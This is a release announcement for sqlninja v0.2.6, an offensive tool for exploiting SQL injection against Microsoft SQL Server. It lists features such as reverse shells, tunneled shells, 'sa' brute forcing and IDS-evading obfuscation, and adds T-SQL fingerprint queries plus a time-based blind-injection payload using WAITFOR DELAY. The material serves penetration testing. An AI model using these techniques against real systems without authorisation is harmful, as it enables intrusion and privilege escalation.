Sqlninja v.0.2.6 Released
Sqlninja's goal is to exploit SQL injection vulnerabilities in web applications that use Microsoft SQL Server as the back end. There are a lot of other SQL injection tools out there, but sqlninja, instead of extracting data, focuses on getting an interactive shell on the remote DB server and using it as a foothold in the target network. In a nutshell, here's what it does:
- Fingerprint of the remote SQL Server (version, user performing the queries, user privileges, xp_cmdshell availability, DB server authentication mode)
- Brute force of the 'sa' password
- Privilege escalation to 'sa'
- Creation of a custom xp_cmdshell if the original one has been disabled
- Upload of executables
- Reverse scan in order to find a port that can be used for a reverse shell
- Direct and reverse shell, both TCP and UDP
- DNS tunneled pseudo-shell, when no ports are available for a bind shell
- ICMP tunneled shell, if the target DBMS can communicate via ICMP Echo with the attacking machine
- Metasploit wrapping, when you want to use Meterpreter or even get GUI access on the remote DB server
- OS privilege escalation on the remote DB server using token kidnapping or through CVE-2010-0232
- All of the above can be done with obfuscated SQL code, in order to confuse IDS/IPS systems
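The fingerprint step in the list above boils down to a handful of questions that can be asked of the server directly. The T-SQL below is an added example of how to answer them by hand (for instance when verifying what a tool reports, or when injecting one query at a time through a boolean or time-based condition); it is not sqlninja's own code and does not show how the tool phrases or exfiltrates these queries. It assumes a SQL Server 2005 or later target for the sys.configurations and sys.sql_logins catalog views; the master..sysobjects lookup also works on SQL Server 2000.

```sql
-- Added example: manual T-SQL fingerprint of a Microsoft SQL Server target.
-- Not sqlninja's code; each statement answers one of the questions the tool's
-- fingerprint step asks. Assumes SQL Server 2005+ unless noted otherwise.

-- 1. Version and patch level of the engine.
SELECT @@VERSION AS version_banner;
SELECT SERVERPROPERTY('ProductVersion') AS product_version,
       SERVERPROPERTY('ProductLevel')   AS patch_level,
       SERVERPROPERTY('Edition')        AS edition;

-- 2. Login and database user the injected queries run as.
SELECT SYSTEM_USER AS login_name, USER_NAME() AS db_user;

-- 3. Privileges. sysadmin membership (1 = member) decides whether xp_cmdshell
--    and sp_configure are usable without first escalating to 'sa'.
SELECT IS_SRVROLEMEMBER('sysadmin')   AS is_sysadmin,
       IS_SRVROLEMEMBER('serveradmin') AS is_serveradmin;

-- 4. xp_cmdshell availability: does the procedure still exist, and is it
--    enabled? On 2005+ it ships disabled; value_in_use = 1 means enabled.
--    The sysobjects lookup also works on SQL Server 2000 (type 'X' = extended proc).
SELECT name, value, value_in_use
FROM   sys.configurations
WHERE  name = 'xp_cmdshell';
SELECT COUNT(*) AS xp_cmdshell_exists
FROM   master..sysobjects
WHERE  name = 'xp_cmdshell' AND xtype = 'X';

-- 5. Authentication mode: 1 = Windows authentication only, 0 = mixed mode.
--    Only mixed mode exposes a SQL login for 'sa' that can be brute-forced.
SELECT SERVERPROPERTY('IsIntegratedSecurityOnly') AS windows_auth_only;

-- 6. Is the 'sa' login present and enabled? (is_disabled = 1 means disabled.)
SELECT name, is_disabled
FROM   sys.sql_logins
WHERE  name = 'sa';
```

Through an injection point none of these result sets come back directly; each value is typically reduced to a true/false condition (for example `IF IS_SRVROLEMEMBER('sysadmin') = 1 WAITFOR DELAY '0:0:5'`) and read back from the application's response or timing, which is what makes the obfuscation feature in the last bullet relevant.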
Suggestions and comments from all of you, friends, are welcome.